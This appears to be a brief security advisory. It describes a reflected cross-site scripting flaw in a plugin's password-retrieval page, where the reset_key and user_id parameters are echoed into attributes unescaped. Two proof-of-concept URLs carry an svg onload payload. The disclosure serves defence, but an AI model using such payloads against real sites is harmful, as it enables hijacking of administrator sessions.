The plugin does not sanitise and escape the reset_key and user_id parameters before outputting then back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin
https://example.com/dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(/XSS/)%3E&user_id=dd
https://example.com/dashboard/retrieve-password/?reset_key=a&user_id=%22%3E%3Csvg%20onload=prompt(/XSS/)%3E